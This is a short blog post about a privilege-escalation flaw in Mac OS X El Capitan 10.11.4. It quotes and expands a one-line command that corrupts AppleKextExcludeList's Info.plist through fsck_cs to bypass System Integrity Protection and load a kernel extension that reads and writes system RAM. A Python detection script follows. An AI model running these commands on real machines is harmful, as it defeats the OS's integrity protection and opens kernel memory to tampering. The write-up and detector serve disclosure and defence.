Last week Apple launched the iPhone SE and a new iPad, and alongside them released iOS 9.3 and Mac OS X El Capitan 10.11.4. The update still contains a privilege escalation vulnerability that can affect 130 million Apple customers. Apple has released updates after this vulnerability, so you should update your devices.
Disable AppleKextExcludeList to pwn SIP on 10.11.4: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
— Stefan Esser (@i0n1c) March 28, 2016
This expands out to…
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
…which creates a symbolic link to AppleKextExcludeList.kext’s Info.plist from /dev/diskX, and then gets fsck_cs to work on /dev/diskX and pipe stdout to that linked Info.plist file, thus trashing it with garbage. We then touch all the extensions and reboot to let our changes take effect. We can do all this on the locked-out /System file because fsck_cs has the all-important com.apple.rootless.install attribute.
The aforementioned Info.plist file, now destroyed, is used by SIP to whitelist some kernel extensions and specifically block others from being loaded. It normally blacklists Apple’s own kernel extension AppleHWAccess.kext, but with the configuration file destroyed, we can now load it and use it to read and write as we please from and to system RAM.
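A defender-side check for the two artifacts described above, as an added example that is not from the original post or from Apple: it tests whether the exclude list's Info.plist still parses as a property list, and whether any disk* entry under /dev is a symbolic link resolving into /System. The function names and the "non-empty dictionary" criterion are assumptions made for this example.

```python
import os
import plistlib

# Path as given on the page.
EXCLUDE_LIST = ("/System/Library/Extensions/AppleKextExcludeList.kext"
                "/Contents/Info.plist")


def plist_is_intact(path):
    """Return (ok, reason); a file overwritten with tool output will not parse."""
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)
    except OSError as exc:
        return False, f"unreadable: {type(exc).__name__}"
    except Exception as exc:  # InvalidFileException, ExpatError, ...
        return False, f"unparseable: {type(exc).__name__}"
    # Assumption: an intact Info.plist is a non-empty dictionary.
    if not isinstance(data, dict) or not data:
        return False, "unparseable: empty or not a dictionary"
    return True, "ok"


def suspicious_dev_links(dev_dir="/dev", protected_prefix="/System/"):
    """Return (link, target) for disk* symlinks in dev_dir under protected_prefix."""
    hits = []
    for name in sorted(os.listdir(dev_dir)):
        link = os.path.join(dev_dir, name)
        # Real disk nodes are device files; a symlink named disk* is anomalous.
        if name.startswith("disk") and os.path.islink(link):
            target = os.path.realpath(link)
            if target.startswith(protected_prefix):
                hits.append((link, target))
    return hits


if __name__ == "__main__":
    ok, reason = plist_is_intact(EXCLUDE_LIST)
    print(f"{EXCLUDE_LIST}: {'intact' if ok else 'ALERT ' + reason}")
    for link, target in suspicious_dev_links():
        print(f"ALERT {link} -> {target}")
```

Both functions take their paths as parameters, so the same checks can be pointed at a mounted disk image or a forensic copy instead of the live system.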